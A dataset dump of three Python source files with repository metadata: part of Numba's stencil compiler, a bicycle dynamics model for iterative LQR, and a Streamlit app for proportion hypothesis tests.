                        # individual elements out of the tuple indexing
                        # expression and add the corresponding index variable
                        # to them and then reconstitute as a tuple that can
                        # index the array.
                        for dim in range(ndim):
                            tmpname = ir_utils.mk_unique_var("const_index")
                            tmpvar = ir.Var(scope, tmpname, loc)
                            new_body.append(ir.Assign(ir.Const(dim, loc),
                                                      tmpvar, loc))
                            const_index_vars += [tmpvar]
                            index_var = ir.Var(scope, index_names[dim], loc)
                            index_vars += [index_var]

                            tmpname = ir_utils.mk_unique_var("ind_stencil_index")
                            tmpvar = ir.Var(scope, tmpname, loc)
                            ind_stencils += [tmpvar]
                            getitemname = ir_utils.mk_unique_var("getitem")
                            getitemvar = ir.Var(scope, getitemname, loc)
                            getitemcall = ir.Expr.getitem(stmt_index_var,
                                                          const_index_vars[dim], loc)
                            new_body.append(ir.Assign(getitemcall, getitemvar, loc))
                            # Get the type of this particular part of the index tuple.
                            if isinstance(stmt_index_var_typ, types.ConstSized):
                                one_index_typ = stmt_index_var_typ[dim]
                            else:
                                one_index_typ = stmt_index_var_typ[:]
                            # If the array is indexed with a slice then we
                            # have to add the index value with a call to
                            # slice_addition.
                            if isinstance(one_index_typ, types.misc.SliceType):
                                sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
                                sa_func = numba.njit(slice_addition)
                                sa_func_typ = types.functions.Dispatcher(sa_func)
                                typemap[sa_var.name] = sa_func_typ
                                g_sa = ir.Global("slice_addition", sa_func, loc)
                                new_body.append(ir.Assign(g_sa, sa_var, loc))
                                slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
                                calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
                                new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
                            else:
                                acc_call = ir.Expr.binop(operator.add, getitemvar,
                                                         index_vars[dim], loc)
                                new_body.append(ir.Assign(acc_call, tmpvar, loc))

                        tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
                        new_body.append(ir.Assign(tuple_call, s_index_var, loc))
                        new_body.append(ir.Assign(
                            ir.Expr.getitem(stmt.value.value, s_index_var, loc),
                            stmt.target, loc))
                else:
                    new_body.append(stmt)
            block.body = new_body

        if need_to_calc_kernel:
            # Find the size of the kernel by finding the maximum absolute value
            # index used in the kernel specification.
            neighborhood = [[0,0] for _ in range(ndim)]
            if len(kernel_consts) == 0:
                raise NumbaValueError("Stencil kernel with no accesses to "
                                      "relatively indexed arrays.")

            for index in kernel_consts:
                if isinstance(index, tuple) or isinstance(index, list):
                    for i in range(len(index)):
                        te = index[i]
                        if isinstance(te, ir.Var) and te.name in const_dict:
                            te = const_dict[te.name]
                        if isinstance(te, int):
                            neighborhood[i][0] = min(neighborhood[i][0], te)
                            neighborhood[i][1] = max(neighborhood[i][1], te)
                        else:
                            raise NumbaValueError(
                                "stencil kernel index is not constant,"
                                "'neighborhood' option required")
                    index_len = len(index)
                elif isinstance(index, int):
                    neighborhood[0][0] = min(neighborhood[0][0], index)
                    neighborhood[0][1] = max(neighborhood[0][1], index)
                    index_len = 1
                else:
                    raise NumbaValueError(
                        "Non-tuple or non-integer used as stencil index.")
                if index_len != ndim:
                    raise NumbaValueError(
                        "Stencil index does not match array dimensionality.")

        return (neighborhood, relatively_indexed)

    def get_return_type(self, argtys):
        if config.DEBUG_ARRAY_OPT >= 1:
            print("get_return_type", argtys)
            ir_utils.dump_blocks(self.kernel_ir.blocks)

        if not isinstance(argtys[0], types.npytypes.Array):
            raise NumbaValueError("The first argument to a stencil kernel must "
                                  "be the primary input array.")

        from numba.core import typed_passes
        typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
                self._typingctx,
                self._targetctx,
                self.kernel_ir,
                argtys,
                None,
                {})
        if isinstance(return_type, types.npytypes.Array):
            raise NumbaValueError(
                "Stencil kernel must return a scalar and not a numpy array.")

        real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
                                        argtys[0].layout)
        return (real_ret, typemap, calltypes)

    def _install_type(self, typingctx):
        """Constructs and installs a typing class for a StencilFunc object in
        the input typing context.
        """
        _ty_cls = type('StencilFuncTyping_' +
                       str(self.id),
                       (AbstractTemplate,),
                       dict(key=self, generic=self._type_me))
        typingctx.insert_user_function(self, _ty_cls)

    def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
        # look in the type cache to find if result array is passed
        (_, result, typemap, calltypes) = self._type_cache[argtys]
        new_func = self._stencil_wrapper(result, sigret, return_type, typemap,
                                         calltypes, *argtys)
        return new_func

    def _type_me(self, argtys, kwtys):
        """
        Implement AbstractTemplate.generic() for the typing class
        built by StencilFunc._install_type().
        Return the call-site signature.
        """
        if (self.neighborhood is not None and
            len(self.neighborhood) != argtys[0].ndim):
            raise NumbaValueError("%d dimensional neighborhood specified "
                                  "for %d dimensional input array" %
                                  (len(self.neighborhood), argtys[0].ndim))

        argtys_extra = argtys
        sig_extra = ""
        result = None
        if 'out' in kwtys:
            argtys_extra += (kwtys['out'],)
            sig_extra += ", out=None"
            result = kwtys['out']
        if 'neighborhood' in kwtys:
            argtys_extra += (kwtys['neighborhood'],)
            sig_extra += ", neighborhood=None"

        # look in the type cache first
        if argtys_extra in self._type_cache:
            (_sig, _, _, _) = self._type_cache[argtys_extra]
            return _sig

        (real_ret, typemap, calltypes) = self.get_return_type(argtys)
        sig = signature(real_ret, *argtys_extra)
        dummy_text = ("def __numba_dummy_stencil({}{}):\n    pass\n".format(
                        ",".join(self.kernel_ir.arg_names), sig_extra))
        exec(dummy_text) in globals(), locals()
        dummy_func = eval("__numba_dummy_stencil")
        sig = sig.replace(pysig=utils.pysignature(dummy_func))
        self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
        self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
        return sig

    def copy_ir_with_calltypes(self, ir, calltypes):
        """
        Create a copy of a given IR along with its calltype information.
        We need a copy of the calltypes because copy propagation applied
        to the copied IR will change the calltypes and make subsequent
        uses of the original IR invalid.
        """
        copy_calltypes = {}
        kernel_copy = ir.copy()
        kernel_copy.blocks = {}
        # For each block...
        for (block_label, block) in ir.blocks.items():
            new_block = copy.deepcopy(ir.blocks[block_label])
            new_block.body = []
            # For each statement in each block...
            for stmt in ir.blocks[block_label].body:
                # Copy the statement to the new copy of the kernel
                # and if the original statement is in the original
                # calltypes then add the type associated with this
                # statement to the calltypes copy.
                scopy = copy.deepcopy(stmt)
                new_block.body.append(scopy)
                if stmt in calltypes:
                    copy_calltypes[scopy] = calltypes[stmt]
            kernel_copy.blocks[block_label] = new_block
        return (kernel_copy, copy_calltypes)

    def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
        # Overall approach:
        # 1) Construct a string containing a function definition for the stencil function
        #    that will execute the stencil kernel.  This function definition includes a
        #    unique stencil function name, the parameters to the stencil kernel, loop
        #    nests across the dimensions of the input array.  Those loop nests use the
        #    computed stencil kernel size so as not to try to compute elements where
        #    elements outside the bounds of the input array would be needed.
        # 2) The but of the loop nest in this new function is a special sentinel
        #    assignment.
        # 3) Get the IR of this new function.
        # 4) Split the block containing the sentinel assignment and remove the sentinel
        #    assignment.  Insert the stencil kernel IR into the stencil function IR
        #    after label and variable renaming of the stencil kernel IR to prevent
        #    conflicts with the stencil function IR.
        # 5) Compile the combined stencil function IR + stencil kernel IR into existence.

        # Copy the kernel so that our changes for this callsite
        # won't effect other callsites.
        (kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
                                            self.kernel_ir, calltypes)
        # The stencil kernel body becomes the body of a loop, for which args aren't needed.
        ir_utils.remove_args(kernel_copy.blocks)
        first_arg = kernel_copy.arg_names[0]

        in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
        name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
        ir_utils.apply_copy_propagate(
            kernel_copy.blocks,
            in_cps,
            name_var_table,
            typemap,
            copy_calltypes)

        if "out" in name_var_table:
            raise NumbaValueError("Cannot use the reserved word 'out' in stencil kernels.")

        sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
        if config.DEBUG_ARRAY_OPT >= 1:
            print("name_var_table", name_var_table, sentinel_name)

        the_array = args[0]

        if config.DEBUG_ARRAY_OPT >= 1:
            print("_stencil_wrapper", return_type, return_type.dtype,
                   type(return_type.dtype), args)
            ir_utils.dump_blocks(kernel_copy.blocks)

        # We generate a Numba function to execute this stencil and here
        # create the unique name of this function.
        stencil_func_name = "__numba_stencil_%s_%s" % (
                                        hex(id(the_array)).replace("-", "_"),
                                        self.id)

        # We will put a loop nest in the generated function for each
        # dimension in the input array.  Here we create the name for
        # the index variable for each dimension.  index0, index1, ...
        index_vars = []
        for i in range(the_array.ndim):
            index_var_name = ir_utils.get_unused_var_name("index" + str(i),
                                                          name_var_table)
            index_vars += [index_var_name]

        # Create extra signature for out and neighborhood.
        out_name = ir_utils.get_unused_var_name("out", name_var_table)
        neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
                                                         name_var_table)
        sig_extra = ""
        if result is not None:
            sig_extra += ", {}=None".format(out_name)
        if "neighborhood" in dict(self.kws):
            sig_extra += ", {}=None".format(neighborhood_name)

        # Get a list of the standard indexed array names.
        standard_indexed = self.options.get("standard_indexing", [])

        if first_arg in standard_indexed:
            raise NumbaValueError("The first argument to a stencil kernel must "
                                  "use relative indexing, not standard indexing.")

        if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
            raise NumbaValueError("Standard indexing requested for an array name "
                                  "not present in the stencil kernel definition.")

        # Add index variables to getitems in the IR to transition the accesses
        # in the kernel from relative to regular Python indexing.  Returns the
        # computed size of the stencil kernel and a list of the relatively indexed
        # arrays.
        kernel_size, relatively_indexed = self.add_indices_to_kernel(
                kernel_copy, index_vars, the_array.ndim,
                self.neighborhood, standard_indexed, typemap, copy_calltypes)
        if self.neighborhood is None:
            self.neighborhood = kernel_size

        if config.DEBUG_ARRAY_OPT >= 1:
            print("After add_indices_to_kernel")
            ir_utils.dump_blocks(kernel_copy.blocks)

        # The return in the stencil kernel becomes a setitem for that
        # particular point in the iteration space.
        ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
                                                      index_vars, out_name)

        if config.DEBUG_ARRAY_OPT >= 1:
            print("After replace_return_with_setitem", ret_blocks)
            ir_utils.dump_blocks(kernel_copy.blocks)

        # Start to form the new function to execute the stencil kernel.
        func_text = "def {}({}{}):\n".format(stencil_func_name,
                        ",".join(kernel_copy.arg_names), sig_extra)

        # Get loop ranges for each dimension, which could be either int
        # or variable.  In the latter case we'll use the extra neighborhood
        # argument to the function.
        ranges = []
        for i in range(the_array.ndim):
            if isinstance(kernel_size[i][0], int):
                lo = kernel_size[i][0]
                hi = kernel_size[i][1]
            else:
                lo = "{}[{}][0]".format(neighborhood_name, i)
                hi = "{}[{}][1]".format(neighborhood_name, i)
            ranges.append((lo, hi))

        # If there are more than one relatively indexed arrays, add a call to
        # a function that will raise an error if any of the relatively indexed
        # arrays are of different size than the first input array.
        if len(relatively_indexed) > 1:
            func_text += "    raise_if_incompatible_array_sizes(" + first_arg
            for other_array in relatively_indexed:
                if other_array != first_arg:
                    func_text += "," + other_array
            func_text += ")\n"

        # Get the shape of the first input array.
        shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
        func_text += "    {} = {}.shape\n".format(shape_name, first_arg)

        # Converts cval to a string constant
        def cval_as_str(cval):
            if not np.isfinite(cval):
                # See if this is a string-repr numerical const, issue #7286
                if np.isnan(cval):
                    return "np.nan"
                elif np.isinf(cval):
                    if cval < 0:
                        return "-np.inf"
                    else:
                        return "np.inf"
            else:
                return str(cval)

        # If we have to allocate the output array (the out argument was not used)
        # then us numpy.full if the user specified a cval stencil decorator option
        # or np.zeros if they didn't to allocate the array.
        if result is None:
            return_type_name = numpy_support.as_dtype(
                               return_type.dtype).type.__name__
            if "cval" in self.options:
                cval = self.options["cval"]
                if return_type.dtype != typing.typeof.typeof(cval):
                    msg = "cval type does not match stencil return type."
                    raise NumbaValueError(msg)
                out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
                            out_name, shape_name, cval_as_str(cval),
                            return_type_name)
            else:
                out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
                            out_name, shape_name, return_type_name)
            func_text += "    " + out_init
        else: # result is present, if cval is set then use it
            if "cval" in self.options:
                cval = self.options["cval"]
                cval_ty = typing.typeof.typeof(cval)
                if not self._typingctx.can_convert(cval_ty, return_type.dtype):
                    msg = "cval type does not match stencil return type."
                    raise NumbaValueError(msg)
                out_init = "{}[:] = {}\n".format(out_name, cval_as_str(cval))
                func_text += "    " + out_init

        offset = 1
        # Add the loop nests to the new function.
        for i in range(the_array.ndim):
            for j in range(offset):
                func_text += "    "
            # ranges[i][0] is the minimum index used in the i'th dimension
            # but minimum's greater than 0 don't preclude any entry in the array.
            # So, take the minimum of 0 and the minimum index found in the kernel
            # and this will be a negative number (potentially -0).  Then, we do
            # unary - on that to get the positive offset in this dimension whose
            # use is precluded.
            # ranges[i][1] is the maximum of 0 and the observed maximum index
            # in this dimension because negative maximums would not cause us to
            # preclude any entry in the array from being used.
            func_text += ("for {} in range(-min(0,{}),"
                          "{}[{}]-max(0,{})):\n").format(
                            index_vars[i],
                            ranges[i][0],
                            shape_name,
                            i,
                            ranges[i][1])
            offset += 1

        for j in range(offset):
            func_text += "    "
        # Put a sentinel in the code so we can locate it in the IR.  We will
        # remove this sentinel assignment and replace it with the IR for the
        # stencil kernel body.
        func_text += "{} = 0\n".format(sentinel_name)
        func_text += "    return {}\n".format(out_name)

        if config.DEBUG_ARRAY_OPT >= 1:
            print("new stencil func text")
            print(func_text)

        # Force the new stencil function into existence.
        exec(func_text) in globals(), locals()
        stencil_func = eval(stencil_func_name)
        if sigret is not None:
            pysig = utils.pysignature(stencil_func)
            sigret.pysig = pysig

        # Get the IR for the newly created stencil function.
        from numba.core import compiler
        stencil_ir = compiler.run_frontend(stencil_func)
        ir_utils.remove_dels(stencil_ir.blocks)

        # rename all variables in stencil_ir afresh
        var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
        new_var_dict = {}
        reserved_names = ([sentinel_name, out_name, neighborhood_name,
                           shape_name] + kernel_copy.arg_names + index_vars)
        for name, var in var_table.items():
            if not name in reserved_names:
                new_var_dict[name] = ir_utils.mk_unique_var(name)
        ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)

        stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1

        # Shift labels in the kernel copy so they are guaranteed unique
        # and don't conflict with any labels in the stencil_ir.
        kernel_copy.blocks = ir_utils.add_offset_to_labels(
                                kernel_copy.blocks, stencil_stub_last_label)
        new_label = max(kernel_copy.blocks.keys()) + 1
        # Adjust ret_blocks to account for addition of the offset.
        ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]

        if config.DEBUG_ARRAY_OPT >= 1:
            print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
            print("before replace sentinel stencil_ir")
            ir_utils.dump_blocks(stencil_ir.blocks)
            print("before replace sentinel kernel_copy")
            ir_utils.dump_blocks(kernel_copy.blocks)

        # Search all the block in the stencil outline for the sentinel.
        for label, block in stencil_ir.blocks.items():
            for i, inst in enumerate(block.body):
                if (isinstance(inst, ir.Assign)
                        and inst.target.name == sentinel_name):
                    # We found the sentinel assignment.
                    loc = inst.loc
                    scope = block.scope
                    # split block across __sentinel__
                    # A new block is allocated for the statements prior to the
                    # sentinel but the new block maintains the current block
                    # label.
                    prev_block = ir.Block(scope, loc)
                    prev_block.body = block.body[:i]
                    # The current block is used for statements after sentinel.
                    block.body = block.body[i + 1:]
                    # But the current block gets a new label.
                    body_first_label = min(kernel_copy.blocks.keys())

                    # The previous block jumps to the minimum labelled block of
                    # the parfor body.
                    prev_block.append(ir.Jump(body_first_label, loc))

                    # Add all the parfor loop body blocks to the gufunc
                    # function's IR.
                    for (l, b) in kernel_copy.blocks.items():
                        stencil_ir.blocks[l] = b

                    stencil_ir.blocks[new_label] = block
                    stencil_ir.blocks[label] = prev_block
                    # Add a jump from all the blocks that previously contained
                    # a return in the stencil kernel to the block
                    # containing statements after the sentinel.
                    for ret_block in ret_blocks:
                        stencil_ir.blocks[ret_block].append(
                            ir.Jump(new_label, loc))
                    break
            else:
                continue
            break

        stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
        ir_utils.remove_dels(stencil_ir.blocks)

        assert(isinstance(the_array, types.Type))
        array_types = args

        new_stencil_param_types = list(array_types)

        if config.DEBUG_ARRAY_OPT >= 1:
            print("new_stencil_param_types", new_stencil_param_types)
            ir_utils.dump_blocks(stencil_ir.blocks)

        # Compile the combined stencil function with the replaced loop
        # body in it.
        ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
        new_func = compiler.compile_ir(
            self._typingctx,
            self._targetctx,
            stencil_ir,
            new_stencil_param_types,
            None,
            compiler.DEFAULT_FLAGS,
            {})
        return new_func

    def __call__(self, *args, **kwargs):
        if (self.neighborhood is not None and
            len(self.neighborhood) != args[0].ndim):
            raise ValueError("{} dimensional neighborhood specified for {} "
                             "dimensional input array".format(
                                len(self.neighborhood), args[0].ndim))

        if 'out' in kwargs:
            result = kwargs['out']
            rdtype = result.dtype
            rttype = numpy_support.from_dtype(rdtype)
            result_type = types.npytypes.Array(rttype, result.ndim,
                                               numpy_support.map_layout(result))
            array_types = tuple([typing.typeof.typeof(x) for x in args])
            array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
                                     [result_type])
        else:
            result = None
            array_types = tuple([typing.typeof.typeof(x) for x in args])
            array_types_full = array_types

        if config.DEBUG_ARRAY_OPT >= 1:
            print("__call__", array_types, args, kwargs)

        (real_ret, typemap, calltypes) = self.get_return_type(array_types)
        new_func = self._stencil_wrapper(result, None, real_ret, typemap,
                                         calltypes, *array_types_full)

        if result is None:
            return new_func.entry_point(*args)
        else:
            return new_func.entry_point(*(args+(result,)))


def stencil(func_or_mode='constant', **options):
    # called on function without specifying mode style
    if not isinstance(func_or_mode, str):
        mode = 'constant'  # default style
        func = func_or_mode
    else:
        mode = func_or_mode
        func = None

    for option in options:
        if option not in ["cval", "standard_indexing", "neighborhood"]:
            raise ValueError("Unknown stencil option " + option)

    wrapper = _stencil(mode, options)
    if func is not None:
        return wrapper(func)
    return wrapper


def _stencil(mode, options):
    if mode != 'constant':
        raise ValueError("Unsupported mode style " + mode)

    def decorated(func):
        from numba.core import compiler

        kernel_ir = compiler.run_frontend(func)
        return StencilFunc(kernel_ir, mode, options)

    return decorated


@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
    "lowering for dummy stencil calls"
    return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
```
stats: avg_line_length 47.849579 · max_line_length 141 · alphanum_fraction 0.554133 · count_classes 36,754 · score_classes 0.924327 · count_generators 0 · score_generators 0 · count_decorators 1,309 · score_decorators 0.03292 · count_async_functions 0 · score_async_functions 0 · count_documentation 10,636 · score_documentation 0.267485
hexsha `4c30fc13cf631ce207921b9c3acc713c3fb36b5f` · size 3,754 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | examples/bicycle/bicycle_dynamics.py | lujieyang/irs_lqr | bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f | ["MIT"] | 6 | 2021-11-20T19:05:06.000Z | 2022-01-31T00:10:41.000Z |
| issues | examples/bicycle/bicycle_dynamics.py | lujieyang/irs_lqr | bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f | ["MIT"] | 10 | 2021-07-24T19:50:36.000Z | 2021-11-20T19:06:40.000Z |
| forks | examples/bicycle/bicycle_dynamics.py | lujieyang/irs_lqr | bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f | ["MIT"] | 1 | 2021-12-15T22:09:31.000Z | 2021-12-15T22:09:31.000Z |

content:
```python
import numpy as np
import pydrake.symbolic as ps
import torch
import time

from irs_lqr.dynamical_system import DynamicalSystem


class BicycleDynamics(DynamicalSystem):
    def __init__(self, h):
        super().__init__()
        """
        x = [x pos, y pos, heading, speed, steering_angle]
        u = [acceleration, steering_velocity]
        """
        self.h = h
        self.dim_x = 5
        self.dim_u = 2

        """Jacobian computations"""
        self.x_sym = np.array([ps.Variable("x_{}".format(i)) for i in range(self.dim_x)])
        self.u_sym = np.array([ps.Variable("u_{}".format(i)) for i in range(self.dim_u)])
        self.f_sym = self.dynamics_sym(self.x_sym, self.u_sym)
        self.jacobian_xu_sym = ps.Jacobian(self.f_sym, np.hstack((self.x_sym, self.u_sym)))

    def dynamics_sym(self, x, u):
        """
        Symbolic expression for dynamics. Used to compute
        linearizations of the system.
        x (np.array, dim: n): state
        u (np.array, dim: m): action
        """
        heading = x[2]
        v = x[3]
        steer = x[4]
        dxdt = np.array([
            v * ps.cos(heading),
            v * ps.sin(heading),
            v * ps.tan(steer),
            u[0],
            u[1]
        ])
        x_new = x + self.h * dxdt
        return x_new

    def dynamics(self, x, u):
        """
        Numeric expression for dynamics.
        x (np.array, dim: n): state
        u (np.array, dim: m): action
        """
        heading = x[2]
        v = x[3]
        steer = x[4]
        dxdt = np.array([
            v * np.cos(heading),
            v * np.sin(heading),
            v * np.tan(steer),
            u[0],
            u[1]
        ])
        x_new = x + self.h * dxdt
        return x_new

    def dynamics_batch(self, x, u):
        """
        Batch dynamics. Uses pytorch for
        -args:
            x (np.array, dim: B x n): batched state
            u (np.array, dim: B x m): batched input
        -returns:
            xnext (np.array, dim: B x n): batched next state
        """
        heading = x[:,2]
        v = x[:,3]
        steer = x[:,4]
        dxdt = np.vstack((
            v * np.cos(heading),
            v * np.sin(heading),
            v * np.tan(steer),
            u[:,0],
            u[:,1]
        )).transpose()
        x_new = x + self.h * dxdt
        return x_new

    def dynamics_batch_torch(self, x, u):
        """
        Batch dynamics. Uses pytorch for
        -args:
            x (np.array, dim: B x n): batched state
            u (np.array, dim: B x m): batched input
        -returns:
            xnext (np.array, dim: B x n): batched next state
        """
        x = torch.Tensor(x).cuda()
        u = torch.Tensor(u).cuda()
        heading = x[:,2]
        v = x[:,3]
        steer = x[:,4]
        dxdt = torch.vstack((
            v * torch.cos(heading),
            v * torch.sin(heading),
            v * torch.tan(steer),
            u[:,0],
            u[:,1]
        )).T
        x_new = x + self.h * dxdt
        return x_new

    def jacobian_xu(self, x, u):
        """
        Recover linearized dynamics dfdx as a function of x, u
        """
        env = {self.x_sym[i]: x[i] for i in range(self.dim_x)}
        env.update({self.u_sym[i]: u[i] for i in range(self.dim_u)})
        f_x = ps.Evaluate(self.jacobian_xu_sym, env)
        return f_x

    def jacobian_xu_batch(self, x, u):
        """
        Recover linearized dynamics dfd(xu) as a function of x, u
        """
        dxdu_batch = np.zeros((
            x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))
        for i in range(x.shape[0]):
            dxdu_batch[i] = self.jacobian_xu(x[i], u[i])
        return dxdu_batch
```
stats: avg_line_length 28.225564 · max_line_length 91 · alphanum_fraction 0.483751 · count_classes 3,616 · score_classes 0.963239 · count_generators 0 · score_generators 0 · count_decorators 0 · score_decorators 0 · count_async_functions 0 · score_async_functions 0 · count_documentation 1,151 · score_documentation 0.306606
hexsha `4c30fdedde14a46b90015527caf9d689634cdfab` · size 6,504 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | apps/proportions.py | harmkenn/PST_Deploy_Test | 2484acf13f1f998c98fa94fad98c1f75c27d292b | ["MIT"] | null | null | null |
| issues | apps/proportions.py | harmkenn/PST_Deploy_Test | 2484acf13f1f998c98fa94fad98c1f75c27d292b | ["MIT"] | null | null | null |
| forks | apps/proportions.py | harmkenn/PST_Deploy_Test | 2484acf13f1f998c98fa94fad98c1f75c27d292b | ["MIT"] | null | null | null |

content:
```python
import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *


def app():
    # title of the app
    st.subheader("Proportions")
    st.sidebar.subheader("Proportion Settings")
    prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])

    if prop_choice == "One Proportion":
        c1,c2,c3 = st.columns(3)
        with c1:
            x = int(st.text_input("Hits",20))
            n = int(st.text_input("Tries",25))
        with c2:
            nullp = float(st.text_input("Null:",.7))
            alpha = float(st.text_input("Alpha",.05))
        with c3:
            st.markdown("Pick a test:")
            tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
        one = st.columns(1)
        with one[0]:
            p_hat = x/n
            tsd = math.sqrt(nullp*(1-nullp)/n)
            cise = math.sqrt(p_hat*(1-p_hat)/n)
            z = (p_hat - nullp)/tsd
            x = np.arange(-4,4,.1)
            y = norm.pdf(x)
            ndf = pd.DataFrame({"x":x,"y":y})
            normp = ggplot(ndf) + coord_fixed(ratio = 4)
            if tail_choice == "Left Tail":
                pv = norm.cdf(z)
                cz = norm.ppf(alpha)
                rcz = cz
                cl = 1 - 2*alpha
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
            if tail_choice == "Two Tails":
                pv = 2*(1-norm.cdf(abs(z)))
                cz = abs(norm.ppf(alpha/2))
                rcz = "±" + str(abs(norm.ppf(alpha/2)))
                cl = 1 - alpha
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
            if tail_choice == "Right Tail":
                pv = 1 - norm.cdf(z)
                cz = -1 * norm.ppf(alpha)
                rcz = cz
                cl = 1 - 2*alpha
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
            me = cz * cise
            rme = "±" + str(abs(me))
            data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
            st.write(data)
            normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
            normp = normp + geom_line(aes(x=x,y=y))
            st.pyplot(ggplot.draw(normp))
            lower = p_hat - abs(me)
            upper = p_hat + abs(me)
            st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")

    if prop_choice == "Two Proportions":
        c1,c2,c3 = st.columns(3)
        with c1:
            x1 = int(st.text_input("Hits 1",20))
            n1 = int(st.text_input("Tries 1",25))
        with c2:
            x2 = int(st.text_input("Hits 2",30))
            n2 = int(st.text_input("Tries 2",50))
        with c3:
            alpha = float(st.text_input("Alpha",.05))
            st.markdown("Pick a test:")
            tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
        one = st.columns(1)
        with one[0]:
            p_hat1 = x1/n1
            q_hat1 = 1 - p_hat1
            p_hat2 = x2/n2
            q_hat2 = 1 - p_hat2
            pp_hat = (x1+x2)/(n1+n2)
            dp_hat = p_hat1 - p_hat2
            pq_hat = 1-pp_hat
            tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
            cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
            z = (p_hat1 - p_hat2)/tsd
            x = np.arange(-4,4,.1)
            y = norm.pdf(x)
            ndf = pd.DataFrame({"x":x,"y":y})
            normp = ggplot(ndf) + coord_fixed(ratio = 4)
            if tail_choice == "Left Tail":
                pv = norm.cdf(z)
                cz = norm.ppf(alpha)
                rcz = cz
                cl = 1 - 2*alpha
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
            if tail_choice == "Two Tails":
                pv = 2*(1-norm.cdf(abs(z)))
                cz = abs(norm.ppf(alpha/2))
                rcz = "±" + str(abs(norm.ppf(alpha/2)))
                cl = 1 - alpha
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
            if tail_choice == "Right Tail":
                pv = 1 - norm.cdf(z)
                cz = -1 * norm.ppf(alpha)
                rcz = cz
                cl = 1 - 2*alpha
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
                normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
            me = cz * cise
            rme = "±" + str(abs(me))
            data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
            st.write(data)
            normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
            normp = normp + geom_line(aes(x=x,y=y))
            st.pyplot(ggplot.draw(normp))
            lower = dp_hat - abs(me)
            upper = dp_hat + abs(me)
            st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
```
